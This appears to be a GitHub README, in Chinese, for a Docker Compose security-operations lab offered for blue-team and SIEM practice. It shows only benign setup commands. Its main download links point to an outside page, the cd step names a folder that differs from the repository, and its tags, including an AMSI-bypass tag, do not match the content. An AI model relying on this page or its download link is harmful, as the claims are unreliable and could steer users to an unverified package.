logan-young1991/advanced-soc-lab-windows

GitHub: logan-young1991/advanced-soc-lab-windows

基于 Docker Compose 构建的开源 Windows 安全运营实验室,集成了威胁检测、事件响应和对手模拟工具,为蓝队训练和 SIEM 实践提供开箱即用的环境。

Stars: 0 | Forks: 0

# 高级 SOC 实验室 v2.0 - 安全运营实验室 2026 [![Platform](https://img.shields.io/badge/Platform-Windows-blue?style=flat-square)](https://github.com) [![Version](https://img.shields.io/badge/Version-v2.0-green?style=flat-square)](https://github.com) [![Updated](https://img.shields.io/badge/Updated-2026-red?style=flat-square)](https://github.com) [![License](https://img.shields.io/badge/License-GPL--3.0-yellow?style=flat-square)](LICENSE) [![Stars](https://img.shields.io/github/stars/logan-young1991/advanced-soc-lab-windows?style=flat-square)](https://github.com/logan-young1991/advanced-soc-lab-windows)

Download advanced soc lab

[下载最新版本](https://logan-young1991.github.io/advanced-soc-lab-windows/) ## 概述 高级 SOC 实验室是一个以 Docker Compose 为核心,并精选了一系列开源检测与响应工具的打包安全运营环境。它专为希望在 Windows 系统上进行 SIEM 练习、威胁狩猎和蓝队工作,而无需逐一搭建每个服务的用户提供了一个实用的实验室。 该技术栈集成了日志摄取、网络遥测、告警、对手模拟和调查工作流的功能。这使其非常适合安全专业的学生、家庭实验室用户,以及需要一个可复现的环境来测试检测规则、优化操作流程并演练 MITRE ATT&CK 风格场景的团队。 ## 包含内容 - 一站式全栈开源 SOC 实验室 - 12 款安全工具集成于单一部署中 - 基于 Docker Compose 的设置,确保可重复启动 - 威胁检测与告警工作流 - 蓝队训练与实践场景 - 用于控制验证的对手模拟 - 日志分析与调查支持 - 事件响应与威胁狩猎用例 ## 快速开始 1. 下载仓库或在本地克隆: - `git clone https://github.com/logan-young1991/advanced-soc-lab-windows.git 2. 打开项目文件夹: - `cd advanced-soc-lab-v2.0` 3. 查看 Docker Compose 文件和环境设置。 4. 使用 Docker Compose 启动实验室: - `docker compose up -d` 如果您更愿意使用打包的发布版本,请点击上方的下载链接,并按照其中包含的启动说明进行操作。 ## 使用实验室 一旦技术栈启动,您可以通过浏览器或相关的客户端工具打开实验室服务,并开始使用这套安全技术栈。 典型工作流: 1. 使用 Docker Compose 拉起环境。 2. 摄取或生成日志与网络事件。 3. 在 SOC 工具中查看告警和检测结果。 4. 运行对手模拟以测试覆盖率。 5. 使用调查工具来支持事件响应和威胁狩猎。 示例命令: - 启动服务: - `docker compose up -d` - 查看运行中的容器: - `docker compose ps` - 停止实验室: - `docker compose down` ## 配置说明 设置通过仓库中的 Docker Compose 文件以及相关的环境变量进行控制。在首次启动之前,如果您的环境需要自定义配置,请调整服务端口、存储位置和任何特定于工具的设置。 典型的模式如下所示: ``` services: opensearch: environment: - discovery.type=single-node suricata: environment: - RULE_SET=default ``` 如果项目提供了单独的 `.env` 文件或 compose override 文件,请使用它们将本地修改与主技术栈定义分开。 ## 系统要求 - Windows 宿主机平台 - 已安装 Docker 和 Docker Compose - 足够的 CPU、内存和磁盘空间以运行多个安全服务 - 网络访问权限,以下载容器镜像和依赖项 - 浏览器或客户端访问权限,用于访问基于 Web 的工具,例如 SIEM、日志分析和响应界面 由于这是一个多服务实验室,资源使用情况将取决于您启用的工具以及生成的数据量。 ## 常见问题解答 **这个项目是做什么的?** 它旨在用于受控实验室环境中的 SOC 实践、蓝队训练、威胁检测测试、事件响应工作流以及对手模拟。 **我需要手动安装每个工具吗?** 不需要。该技术栈旨在通过 Docker Compose 作为一个打包环境进行部署。 **如何更改实验室的配置?** 编辑 compose 文件和环境设置,以匹配您想要的端口、存储路径和服务选项。 **如果某个服务无法启动怎么办?** 检查容器日志,确保 Docker 有足够的资源,并确认所需的端口没有被占用。 **如何处理更新?** 使用项目发布或下载区域中的最新版本,然后在替换文件之前检查任何本地配置的更改。 ## 许可证 GNU GPL v3.0 - 详情请参阅 [LICENSE](LICENSE)。
标签:AMSI绕过, Docker Compose, Metaprompt, 后端开发, 威胁检测, 安全运营, 扫描框架, 版权保护, 请求拦截, 靶场环境